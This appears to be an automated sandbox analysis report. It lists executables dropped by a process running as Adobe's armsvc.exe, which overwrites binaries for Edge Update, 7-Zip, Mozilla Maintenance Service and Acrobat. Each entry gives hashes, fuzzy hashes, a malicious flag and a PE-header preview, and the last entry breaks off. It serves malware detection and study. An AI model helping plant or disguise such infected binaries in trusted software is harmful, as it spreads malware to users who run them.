Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.........................................................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...............R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1441792
Entropy (8bit):	4.919924310443888
Encrypted:	false
SSDEEP:	24576:icssmrOGJ0eeQ2yPyzc+E7xonyVGc/dT5N:7bmJLeQVPyzc+E7xQ2l
MD5:	38CFEB2B7C58EF5AC55D957E79071D60
SHA1:	B475771146D2B7A380E341BA208EC43CB3B8A2A2
SHA-256:	3D46E78BB2A9537280C711F3495011A171E6C0553E54094C061DAF64689D27EB
SHA-512:	D030DF039FF4875A1D790C7605F96443D200B13ED6AD6FB9BA711967563E2F1260FCB770B08D0BA1487EF72107082AE4BA042F67B92C7C32063E68DA5BA1A8AE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A\|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.............................p ........... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......\|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc............... ..............@...........................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1490432
Entropy (8bit):	5.02613966811235
Encrypted:	false
SSDEEP:	24576:0TfcT++foSBWU2YxhkgjGJ0eeQ2yPyzc+E7xonyVGc/dT5N:cfcK+foQWU2YnPyJLeQVPyzc+E7xQ2l
MD5:	7AC4F5091679F4EA6709D7F6C37055D3
SHA1:	77B69049E498B1639CAF7610F48E26A723B954F8
SHA-256:	995AAF9BE0C5D787DBF85127DA59DD04B9F033D6DC58D81E9F22CCA35AC22BC0
SHA-512:	11E7CAFE5D23A5B19071CE553AE35EF34137E0521412BEAC290C8020DDA9E06127ADA797A375690413A5B3F5682C4CF0A1C4DBED15578D03F2E6DBEA1DC47F63
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@...........................!..............................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......\|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1327616
Entropy (8bit):	4.797111427072514
Encrypted:	false
SSDEEP:	24576:/bBRzBgDGJ0eeQ2yPyzc+E7xonyVGc/dT5N:zBRVgSJLeQVPyzc+E7xQ2l
MD5:	D05B11FF287279959B7D2DDDACF4CF02
SHA1:	F00F45089DACF2EA81B6ECF4BDAB4919FE4285FA
SHA-256:	02212DC25FD8625470EE21BD3E3F6A69F690345D10CC803DBF3B7ECFD42D7A64
SHA-512:	2539D35F801542209ADE42AFEA057BB17FF12491E01CAD1577EFB411C68DF035E9CA408198379294755F99DEEBEC8CA04A123A68D6636842CCA1AC05C45333EE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.................................t...........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...............R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2168832
Entropy (8bit):	7.93790619769932
Encrypted:	false
SSDEEP:	49152:oy53w24gQu3TPZ2psFkiSqwoz8JLeQVPyzc+E7xQ2l:oyFQgZqsFki+oz81vcbE7xQ2l
MD5:	BCD40F55DB6F9DE2C72519B69421A329
SHA1:	3ED0A425E3397B2527B6FD123E4D3115A7AC9A6C
SHA-256:	502ABB7121B1264F82B93D27952B8D152ED02433D86B2E85F18BA032C47CFF02
SHA-512:	F6CCC2D0897D6B9B8DD5430E7A72F8D90F9170D778F793D5F1A90AB0063B3D5E2F16A45412207FB68AE93083CB1FD633CFCF22EFAB5E48464924E77F40221740
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....K9!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.861106056265354
Encrypted:	false
SSDEEP:	24:lvMzdwvMvrvMuvM3vM64vMSvMsRzvMqWtFvM7vMqWmIFvMr1vM1vMQvM0uvMqvMO:WaiRSBmhid74ixq4ZVnyD
MD5:	9E3146B893F46C27F5D9F46E9BC6F4D9
SHA1:	25B7608BDAF854CDDB0FE5BE0231CFE54A496D86
SHA-256:	892B8112ACD01FA43D1447D2A9AAC2E57A18AC6DFFBAD96C25212C36E7705254
SHA-512:	97C45E253B5DE26F6AAC6A783362B4D68DC632DD93E0A24B0B4DC7F325DEB0496E741871194BE2E4CC15914146FCD587BDA03414AFD80B40DF5C9FFE928F5DF9
Malicious:	false
Reputation:	unknown
Preview:	2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-16 08:10:21-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-16 08:10:21-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-16 08:10:21-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-16 08:10:2

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1463296
Entropy (8bit):	5.0305104587479255
Encrypted:	false
SSDEEP:	24576:xQVTZu0J+GJ0eeQ2yPyzc+E7xonyVGc/dT5N:yVTZuAJLeQVPyzc+E7xQ2l
MD5:	E78B9CA154BB75A39A7016C4054776F9
SHA1:	4212D2B4F6FD7DB17941CE586FE8751B23B279DF
SHA-256:	2DADFF9C3949ED2EF24814DC3CD7ADC681B5B069A93F08EC32E3CC09C5392D6B
SHA-512:	65C625B6DF28B24BCBE0E03D67E64CE69D4C454444E94A1DC6923E9E369C8E43171082CE442423A92092AFFA950168D66C3704A35AF5A2DF945860DE241ACC9B
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................. ........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...............t..............@...........................................................................................................................................................................................................................

C:\Program Files\7-Zip\7z.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1790464
Entropy (8bit):	5.358114570592415
Encrypted:	false
SSDEEP:	24576:M+gkEdfh4CovGJ0eeQ2yPyzc+E7xonyVGc/dT5N:JgkE5SMJLeQVPyzc+E7xQ2l
MD5:	133663AC0175A2FB19C341E46F797549
SHA1:	369C8F22F88D0604012239642B95C57F10EC31C5
SHA-256:	FED8C55F742897E8132233D5D92D5F5310645AB52D4F8F37389948C7CF6DA25F
SHA-512:	426D58D99E98AB557EB549C25574E3D59F9FF82EA5BFACC2DFC3644BAECB59B77C8226C811B6275A939FCA526DA58253881527530EB8D908F498C9D818EA1DDC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@...............................%.....x..... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zFM.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1532416
Entropy (8bit):	7.089310041105561
Encrypted:	false
SSDEEP:	24576:8BpDRmi78gkPXlyo0GhjrWGJ0eeQ2yPyzc+E7xonyVGc/dT5N:oNRmi78gkPX4o0GhjtJLeQVPyzc+E7xX
MD5:	048C06B5B8AA89BCB426C31B81BA4484
SHA1:	C85C4C8BF1B671B477987F26E197DFAD3C9EBC91
SHA-256:	BA3CF46626970036E3D1C180A80EC6CA9565A3FB80D61CB3F3433537D9C8CB80
SHA-512:	03DAFE83DCDF500BE3808AEF41FC8165BD67F45C8C2FC70A45FC7830F6164B8AE2BBF4840BF0A33589FBB724B093339B6140949C610C3A0353ACFE2205EA2076
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................s..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zG.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	7.220177456459704
Encrypted:	false
SSDEEP:	24576:YLOS2oPPIXVvGJ0eeQ2yPyzc+E7xonyVGc/dT5N:g/PVJLeQVPyzc+E7xQ2l
MD5:	826FB51055AFE54F3900011243C3C4E6
SHA1:	12012CD714CB96D42FF97696225A67C30E3FFFBB
SHA-256:	1BBFD694DA77066B1AF201872C7A4F496F00F53F2AAEF53A31C94A8C24A8739C
SHA-512:	5B90A3033A605517F46C902FB9E7081BF79710F5FABFF5D0E6E5DF07C9B93B580A4DDE8859956CDE652A2DBE451D120A4D208319ABC480B879C8E48CA780D41F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................Q..... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1251840
Entropy (8bit):	4.674458145400088
Encrypted:	false
SSDEEP:	12288:YYBGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:YYBGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	F825B9EDE1AF47BED59D43B487218D1D
SHA1:	BA489BA32ADE0F4B4183CD50D9C07383495BBF12
SHA-256:	04A83902A46CD4B35F418E8AA7F4B67E57777105DDB92DBADD49B7DA4F6469FD
SHA-512:	9A29468EF2FC1BD677B306A9BB54BED643E0A34B7A9C87A6EE753ED9531E09B39BEC163E6F98539E8EBC594997A1BAB17CD2A53AFD4937552C72FF72876901BF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..........................P......).......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1222656
Entropy (8bit):	6.7017851457820585
Encrypted:	false
SSDEEP:	24576:rtdzQGJ0eeQ2yPyzc+E7xonyVGc/dT5N:rtdLJLeQVPyzc+E7xQ2l
MD5:	2C18954BE6BB52BC8ACD34894716D1D5
SHA1:	E3F062614AE6FED0B9DF4E70B85E02C767175E5B
SHA-256:	CD3F3884827D9777897E18021F922F78A683321D32144DCE018C6A90B986448A
SHA-512:	39923E83CA96FDEB4F7907EBC1AC98CAE3734A4FAB00743EA771EEAD69E9525B0AFCA6F1F7291E31941B016CEBCEA5EA4480F9DD699B3A961D866E093C8699BB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................\\.... .....................................................\|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1564160
Entropy (8bit):	4.797262735345001
Encrypted:	false
SSDEEP:	12288:7vMGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:IGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	7CB0AC63221B3AD0500796DA2B3EC5B3
SHA1:	EA4035AA52BF1AEF6E94BA04FAB0199B8808BCB4
SHA-256:	F4CB29AF5CEAD9134CDA64AE495FE1056145BF706CB6516AB76F9744EA4F4BD0
SHA-512:	99C80689F77BC78458A094A935CEDBEE19E0C144E081E7AC1A2BA796C4EB26D0965693DBF63F8DE25CCA24D104D2460D691E46E8FAAE465E697BECBB507BDED1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...\|...\|...\|B..}...\|B..}...\|...}...\|..S\|...\|..}=..\|..}...\|..}...\|..}...\|..=\|...\|o..\|...\|B..}...\|...\|...\|..}...\|..Q\|...\|..9\|...\|..}...\|Rich...\|................PE..d......d.........."......H...........&.........@.............................0"......%.... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1567744
Entropy (8bit):	5.1690578543521015
Encrypted:	false
SSDEEP:	24576:z5zhM1XSFzGJ0eeQ2yPyzc+E7xonyVGc/dT5N:3MsIJLeQVPyzc+E7xQ2l
MD5:	168A2955BC97DB4FDE3E896185A1668D
SHA1:	F57B51CAA52D5751CF44E21EBCDD362B7FB989FF
SHA-256:	3EF71002CC9DE9AD317638A8E7AC0B7B5A432B37A37B97CA51C3AFC0CC45D006
SHA-512:	6F3C23586170598B393ED7F37284F178110A7B760415310F5D21DDAA0076EB1D3D3DB63174A0DD487E621F120374ED785D299C4BAC2ECE9AC23A814BFD7772D4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.............................."........... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc.......0......................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.4968962129233585
Encrypted:	false
SSDEEP:	49152:1tuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755RJLeQVP5:1jEIa3HIEWOc5L1vcbE7xQ2l
MD5:	39632673955559BEECD2A778F477B95C
SHA1:	4CFFA327349A611F4BF009AD598760EB2B502FEE
SHA-256:	066385F68E7789FF7872BF41CB68BB43D01DEFAC3FB130406FB49FD39BBA8390
SHA-512:	7E6FCC22DB1E45D1267AD643A84C1FADF17032C9AE180096F92A91AE53E07463FA7070614CEDE1C698E96FAF18A3BAEBFD5C84374DEC9D01C3F4A24AF4C265F6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....K.@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999357810181696
Encrypted:	true
SSDEEP:	1572864:AQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAsH:fXhwMhe6AABPiQwF6xQ22Rg
MD5:	D7D645287FB30D5F3256D2757112602C
SHA1:	CDD955B228531CEA3BF52EFC5A4C9E0ECD46CC71
SHA-256:	152BF8F94A18B360D2308CFA6531532FD71D6432A614A798C313DA87EFAB0AFD
SHA-512:	370BE69038C75473BBED50DF51BC5C6C55EBD5833EA6980398A6310537257CB13C5F3F596D5C9CF829ABB0C7CFA8E9B77C5C9AB6AFB236077FABD33124B156FF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	4.736556735699809
Encrypted:	false
SSDEEP:	12288:CWdGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:CWGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	A281D31D654A10B2B1C981BE449CFF18
SHA1:	7775E28D00A49C1D8B8C92E6CD8B8D1FA4FAE416
SHA-256:	8DDD2D976568A005CB72BA0B1A83DF1ABD404A6E5894DA0E743F07280456257B
SHA-512:	1D02A5D50D5A8A00EBACFEDCAB51710CDB22FDC1E2E9C89E9436347B4ECC2EAAF36857521FB474262C16ACE0501C09E642FD66F8C83B71DA307390FAAB2266F7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.\|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.....................................J.... .....................................................\|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6210048
Entropy (8bit):	6.384713574550255
Encrypted:	false
SSDEEP:	98304:LnN9KfxLk6GEQTXsUKzNDU1vcbE7xQ2l:J9Kfe6GEQTX3KhU8m9
MD5:	EE5880A36DB14E247D78FAF9591FA1F2
SHA1:	6641B09F514E9A3FEAE7EF72CAB4B9D200B2CD87
SHA-256:	42DB6BDDB59D548032A4AFC41078374D865D2CC7CAB5579E3A8F7AEE2762CFCB
SHA-512:	A8FA618C72EC371F1FD85BAD9166128E2C5D5F5EBF6EADCA24A4C4CF77F6E76BEBE0C6C9C9ABD40539EDED1981D22B386E1C2AC7249B2F0F963FC1AA76F4CE64
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9\|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9\|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....!._... ..........................................<F.\|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1263616
Entropy (8bit):	4.689248759127094
Encrypted:	false
SSDEEP:	12288:I7GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:I7GJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	0A40CB85F29676B64C80F454A9DD17FD
SHA1:	3F956686E6A0031A5A08065FF5C26BAC47D5DD6D
SHA-256:	118E8C509B4419320CDD1E7F266A6E3DA52C26BF359530C88EE87906E9087B0E
SHA-512:	02F91A8C0B62907DDE3F7BCEBDD1CB8FCA80ABF4D10DE99AF0C9E963964B35A7B240FBBC66E55BBCB75CA7A97EA057FAE6F08D31A27F85F08536C106EF96E24D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........\|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@......................................... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...............h..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12039168
Entropy (8bit):	6.595605993686211
Encrypted:	false
SSDEEP:	98304:ib+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKh1vcbE7xQ2l:EnPgTHIwZnRBk9DdhSUEVIXgKh8m9
MD5:	645C9543EB693EC049BECE28D3EED6C6
SHA1:	A7CFF0A5A36E7FE39072B58FA5E970675363DC3A
SHA-256:	2D7C02FEC57E83EC4AE1EC1DD9977E6CE9C0AAC378E87B7DEC4D701409D88484
SHA-512:	725E063BE27855B5E92C4030A5D0CD7EA08E09E7ADDA131CA48DAE2BE19E7D996F91B8380BA80AD6CE0EF5483475FCFC8C1314AB759396D4DA495AE524BC971D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...\|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@....................................".... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......\|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1428992
Entropy (8bit):	4.95966900780064
Encrypted:	false
SSDEEP:	24576:Hg5FvCPcseGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AfHOJLeQVPyzc+E7xQ2l
MD5:	5A6931ED83133B5CC770D317E4980F77
SHA1:	637672A83D7C84E57D8AD194056FDF02298F780B
SHA-256:	8648D000643901951F7F21ABD477AE217747D28BB012D56B3629DEF0C3CE3A56
SHA-512:	DE64E9823385AFA0141D9B58141808B15F85BC7D4B536C32D428D4F5542A0C394E3996453F00B6A99DEF025BF504A672DDF771DA79C69BB191921891D31AC4EC
Malicious:	true
Reputation:	unknown
